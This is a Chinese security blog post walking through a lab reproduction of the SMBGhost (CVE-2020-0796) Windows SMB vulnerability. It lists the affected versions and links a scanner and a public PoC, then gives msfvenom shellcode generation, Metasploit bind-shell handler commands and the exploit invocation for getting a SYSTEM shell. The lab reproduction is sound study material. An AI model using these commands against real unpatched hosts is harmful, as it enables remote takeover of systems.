CVE-2020-0796(永恒之黑)漏洞复现利用GetShell

描述

北京时间2020年3月12日晚上,微软发布了一个最新到SMB远程代码执行漏洞。
SMB(Server Message Block)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,受黑客攻击的目标系统只要开机在线即可能被入侵。据了解,凡政府机构、企事业单位网络中采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。
被安全厂商命名为SMBGhost、EternalDarkness(“永恒之黑”)——我更喜欢ED这个称呼

影响范围

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

环境

靶机:windows10 1903 x64  
ip:172.16.127.134(关闭防火墙)
攻击机:MacOS ip:10.96.0.53

靶机地址:迅雷口令#X9861b84e#

漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

POC:https://github.com/chompie1337/SMBGhost_RCE_PoC

利用

生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python


#-p windows/x64/meterpreter/bind_tcp 设置payload为windows64位meterpreter控制台下的正向连接




#LPORT=8888 设置开发端口为6666
#-b '\x00' 设置在生成的程序中避免出现'\x00'
#-i 1 设置编码次数为一次
#-f python 设置生成python格式文件

生成shellcode

1、将生成的shellcode全部复制

2、打开POC文件夹的exploit.py(原文件)

然后替换字符

3、打开MSF监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 172.16.127.134
run

4、运行exploit.py脚本

python3 exploit.py -ip 172.16.127.134

若MSF控制台暂时无反应,则control+c终端,重新输入run

参考文章:https://www.cnblogs.com/Iamyoyodan/p/13081273.html

注意

只要成功即是system,但是shellcode极度不稳定,很容易卡死,靶机蓝屏,尤其注意只能以python3去执行脚本,其他版本我尝试后直接蓝屏。
建议靶机关闭防火墙,设置NAT模式,保证两台主机在同一网段内!

Typecho赞赏功能

「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」

冷夜清风

(๑>ڡ<)☆谢谢老板们的投食~

使用微信扫描二维码完成支付


添加新评论

选择表情

  TimeLine

新年忙,过完年后抽时间更新:mask:
--- updated on 2021-02-13 16:42:05 星期六

  About Me

我就是随便写写,您随便看看。
有事说事,没事烧纸,闲人勿扰,谢谢。
工作:网络攻防。
Tips:
1、问问题,请直接使用真实邮箱地址回复,不然你收不到信息。
2、为了防止爬虫骚扰,我已经去掉其他联系方式。

  Recent Comments

  •  zero: git进不去了404
  •  夏目贵志: 很奈斯,我喜欢这种不是改太多的后台主题只是默认的后台主题导航在手机模式下很不友好
  •  dd: 复制不了那个值这么办
  •  dd: 为什么Java安装不成功
  •  nameETC: 爱了(^_^),谢谢大佬
  •  Yolen: 来逛逛。
  •  小光: 大佬可以分享下解压密码吗?
  •  粤: 请问那个解压密码是啥呀
  •  阿巴阿巴: bat总是闪退怎么办呀
  •  JWZ_fit: 我使用的是vmess,在windows上可以连接,在kali上就显示[Warning] v2r...

很多东西宁缺毋滥,流星的光芒短暂而灼热闪耀。

让你变得更好的那个人,往往是你觉得很难与之相处的那个人。

觉得自己做的到和不做的到,其实只在一念之间。

路在自己脚下,没有人可以决定我的方向。

你的选择是做或不做,但不做就永远不会有机会。

凡事顺其自然,遇事处于泰然,得意之时淡然,失意之时坦然,艰辛曲折必然,历尽沧桑悟然。